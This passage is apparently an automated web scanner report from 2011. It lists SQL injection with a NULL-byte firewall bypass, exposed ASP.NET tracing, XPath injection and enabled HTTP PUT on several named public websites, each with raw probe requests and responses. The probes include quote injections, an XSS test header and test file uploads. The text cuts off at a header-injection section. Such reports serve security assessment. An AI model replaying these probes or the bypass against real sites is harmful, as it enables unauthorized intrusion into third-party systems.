User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mybusinesslisting.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 468
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQASCRATT=DEGAHBODBDMEMPECJEJHJALP; path=/
Cache-control: private

Error Occured:<BR><BR>Error # -2147217900 Line 1: Incorrect syntax near '201'.<BR>SQL = Select _tbl_Listings.*, _tbl_Categories.txtName as txtCategory,_tbl_Categories.txtTitle as txtCategoryTitle fro
...[SNIP]...

1.20. http://www.scrapblog.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.scrapblog.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /favicon.ico?1%00'=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scrapblog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 1

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3207

<html>
<head>
<title>The resource cannot be found.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-fami
...[SNIP]...
<!--
[HttpException]: The controller for path '/favicon.ico' was not found or does not implement IController.
at System.Web.Mvc.DefaultControllerFactory.GetControllerInstance(RequestContext requestContext, Type contr
...[SNIP]...

Request 2

GET /favicon.ico?1%00''=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scrapblog.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response 2

HTTP/1.1 302 Found
Date: Wed, 04 May 2011 03:18:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 2.0
Location: /error.aspx?emt=2
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 140

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror.aspx%3femt%3d2">here</a>.</h2>
</body></html>

1.21. http://www.thumb-store.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thumb-store.com
Path:   /favicon.ico

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thumb-store.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 417 Expectation Failed
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 416
Date: Wed, 04 May 2011 03:19:01 GMT
X-Varnish: 2173852738
Age: 0
Via: 1.1 varnish
Cneonction: close
X-Served-By: tdd05.ds.lax1.oversee.net
X-Cache: MISS


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>417 Expectation Failed
...[SNIP]...
<h1>Error 417 Expectation Failed</h1>
...[SNIP]...

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thumb-store.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 302 (Found)
Location: http://spi.domainsponsor.com/skins/favicon/mi_favicon.ico
Server: Oversee Turing v1.0.0
Content-Length: 32
Content-Type: text/html

<html><body><br></body></html>

1.22. http://www.truewoman.com/ [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?id=224' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:26 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2043


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

1.23. http://www.truewoman.com/favicon.ic [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ic' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:23 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2046


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

Request 2

GET /favicon.ic'' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:24 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

1.24. http://www.truewoman.com/favicon.ic [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truewoman.com
Path:   /favicon.ic

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ic?1'=1 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 1

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:01 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2050


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '','173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-0' at line 1 &raquo;</b
...[SNIP]...

Request 2

GET /favicon.ic?1''=1 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:03 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 9641


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...

1.25. http://www.truewoman.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.truewoman.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:10:18 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2047


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

1.26. http://www.truewoman.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php'?id=224 HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:20:15 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2052


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?id=224','173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', ' at line 1 &raquo;</b
...[SNIP]...

1.27. http://www.truewoman.com/index.php [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.truewoman.com
Path:   /index.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /index.php?id=224' HTTP/1.1
Host: www.truewoman.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; __utmz=269886772.1304489524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=269886772.1030400446.1304489524.1304489524.1304489524.1; __utmc=269886772; __utmb=269886772.1.10.1304489524; __qca=P0-1871447548-1304489525476

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:15:59 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10-2ubuntu6
P3P: CP="NOI NID ADMa OUR IND UNI COM NAV"
Cache-Control: private, must-revalidate
Set-Cookie: SN47d74a4a4b1bb=7f219eb0d29ecf81183153bc60085a61; path=/
Vary: Accept-Encoding
Content-Length: 2043


<html><head><title>MODx Content Manager &raquo; </title>
<style>TD, BODY { font-size: 11px; font-family:verdana; }</style>
<script type='text/javascript'>

...[SNIP]...
<b style='color:red;'>&laquo; Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '173.193.214.243', '173.193.214.243-static.reverse.softlayer.com', '', '2011-05-0' at line 1 &raquo;</b
...[SNIP]...

2. ASP.NET tracing enabled  previous  next
There are 4 instances of this issue:

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



2.1. http://www.endlessvacation.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.endlessvacation.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.endlessvacation.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:26:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4757

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.motion-vr.net/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motion-vr.net
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.motion-vr.net

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 04:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4705

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.pledge.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pledge.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.pledge.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:51:27 GMT
Connection: close
Content-Length: 21830

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.4. http://www.woodworking.com/trace.axd  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woodworking.com
Path:   /trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Wed, 04 May 2011 03:32:17 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3. XPath injection  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pewforum.org
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.pewforum.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&DefaultCurrency=840&SiteCurrency=840&ContType=&UserCulture=1033&dm=www.pewforum.org&SiteLanguage=1033; path=/
Set-Cookie: EktGUID=dc9bafc3-1f88-443a-a7e9-781aaebf6fac; expires=Fri, 04-May-2012 02:17:51 GMT; path=/
Set-Cookie: EkAnalytics=0; expires=Fri, 04-May-2012 02:17:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:17:51 GMT
Content-Length: 23681

This is an unclosed string.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
...[SNIP]...

4. HTTP PUT enabled  previous  next
There are 2 instances of this issue:

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.


4.1. http://www.gradtoday.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.gradtoday.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /7707244d3a7c5f43.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /7707244d3a7c5f43.txt HTTP/1.0
Host: www.gradtoday.com
Content-Length: 16

2e5095780c52e581

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 01:57:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.gradtoday.com/7707244d3a7c5f43.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /7707244d3a7c5f43.txt HTTP/1.0
Host: www.gradtoday.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Content-Location: http://www.gradtoday.com/7707244d3a7c5f43.txt
Last-Modified: Wed, 04 May 2011 01:57:40 GMT
Accept-Ranges: bytes
ETag: W/"249669a6fe9cc1:632"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:40 GMT
Connection: close

2e5095780c52e581

4.2. http://www.thenursingscholars.com/favicon.ico  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thenursingscholars.com
Path:   /favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /8a5aef9c531842f2.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /8a5aef9c531842f2.txt HTTP/1.0
Host: www.thenursingscholars.com
Content-Length: 16

b4df595e159cd5e7

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Wed, 04 May 2011 03:47:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.thenursingscholars.com/8a5aef9c531842f2.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /8a5aef9c531842f2.txt HTTP/1.0
Host: www.thenursingscholars.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Wed, 04 May 2011 03:47:20 GMT
Accept-Ranges: bytes
ETag: W/"9eb663f8dacc1:a1c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:47:20 GMT
Connection: close

b4df595e159cd5e7

5. HTTP header injection  previous  next
There are 11 instances of this issue:

Issue background

